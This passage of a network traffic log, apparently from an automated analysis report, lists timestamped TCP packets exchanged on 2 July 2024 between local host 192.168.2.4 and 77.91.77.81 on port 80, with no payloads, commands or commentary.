                                            Jul 2, 2024 08:26:45.864671946 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.864837885 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864849091 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864857912 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864867926 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864877939 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864890099 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.864923000 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.884908915 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.884918928 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.884960890 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.884972095 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.884975910 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.885025978 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.921463013 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.921515942 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.921516895 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.921530008 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.921560049 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.921582937 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.921683073 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.921694994 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.921708107 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.921717882 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.921730995 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.921744108 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.921782017 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.921936989 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.921950102 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.921987057 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.921996117 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.921998978 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922012091 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922029972 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.922059059 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.922229052 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922241926 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922295094 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.922319889 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.922390938 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922404051 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922415972 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922429085 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922439098 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.922456026 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.922485113 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.922563076 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922610998 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.922751904 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922765017 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922776937 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922796965 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.922821999 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.922924042 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922940016 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922951937 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922961950 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.922972918 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.922995090 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.923027039 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.953196049 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953208923 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953221083 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953254938 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.953295946 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.953325987 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953337908 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953349113 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953360081 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953372002 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953375101 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.953411102 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.953519106 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953531027 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953541994 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953602076 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.953711033 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953751087 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.953861952 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953876019 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953922987 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.953927994 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.953963041 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.954113960 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954125881 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954139948 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954153061 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954176903 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.954216003 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.954416037 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954468966 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.954611063 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954622030 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954634905 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954647064 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954655886 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954658985 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.954694033 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.954775095 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954787016 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954797029 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954808950 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954818964 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954822063 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.954848051 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.954878092 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.954943895 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.954982996 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.955430031 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.955440998 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.955451965 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.955487013 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.955514908 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.955581903 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.955593109 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.955602884 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.955612898 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.955629110 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.955640078 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.955672979 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.955750942 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.955764055 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.955809116 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.955878973 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.955920935 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.956065893 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956077099 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956087112 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956115961 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.956146002 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.956250906 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956263065 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956274033 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956290007 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956300974 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956311941 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956312895 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.956336021 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.956371069 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.956383944 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956448078 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.956641912 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956654072 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956665993 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956701040 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.956720114 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.956796885 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956809044 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956819057 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956835985 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.956852913 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.956878901 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.957117081 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.957129955 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.957140923 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.957150936 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.957163095 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.957173109 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.957173109 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.957182884 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.957191944 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.957216978 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.957227945 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.958904028 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.958921909 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.958933115 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.958944082 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.958950043 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.958960056 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.958965063 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.959012032 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.959080935 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959091902 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959131956 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.959153891 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.959274054 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959285021 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959296942 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959314108 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959316969 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.959325075 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959336042 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959350109 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.959381104 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.959408998 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.959680080 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959691048 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959701061 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959712982 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959722996 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959731102 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.959733963 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.959769011 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.959794998 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.959966898 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.960012913 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.975904942 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.975918055 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.975928068 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.975982904 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.975996971 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.976062059 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.976088047 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.976099014 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.976110935 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.976138115 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.976181030 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.976210117 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.976249933 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.013241053 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013262033 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013273954 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013324976 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.013355970 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.013386965 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013398886 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013408899 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013422012 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013430119 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.013463974 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.013700008 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013710976 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013726950 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013737917 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013748884 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.013757944 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.013781071 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.013797045 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.014134884 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.014147043 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.014158010 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.014168024 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.014178991 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.014188051 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.014190912 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.014202118 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.014206886 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.014213085 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.014239073 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.014250040 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.041498899 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.041552067 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.041590929 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.041604042 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.041641951 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.041728973 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.041738033 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.041748047 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.041758060 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.041780949 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.041805029 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.041955948 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042001009 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.042155981 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042166948 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042212963 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.042319059 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042362928 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.042512894 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042522907 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042534113 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042542934 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042552948 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042557001 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.042573929 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.042618990 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.042721987 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042732000 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042742014 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042751074 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042759895 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042768955 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042772055 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.042778969 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042788982 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042798996 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042809010 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.042810917 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.042831898 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.042855024 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.043227911 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043236971 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043246031 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043256044 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043266058 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043276072 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043282032 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.043287039 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043303013 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.043334007 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.043390989 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043401003 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043436050 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.043596983 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043606997 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043643951 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.043797016 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043807030 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043817997 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043848991 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.043936014 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043946981 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.043984890 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.044174910 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044183969 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044229031 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.044325113 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044336081 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044346094 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044356108 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044363976 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044370890 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.044373989 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044421911 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.044593096 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044604063 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044620037 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044629097 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044640064 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044644117 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.044651031 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044661045 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044668913 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.044670105 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044681072 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044687033 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.044689894 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044699907 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044709921 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.044711113 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044727087 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044730902 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.044737101 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.044751883 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.044774055 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.045674086 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.045691013 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.045701027 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.045737982 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.045777082 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.045852900 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.045864105 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.045881033 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.045891047 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.045912981 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.045937061 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:46.046001911 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:46.046041012 CEST6389480192.168.2.477.91.77.81
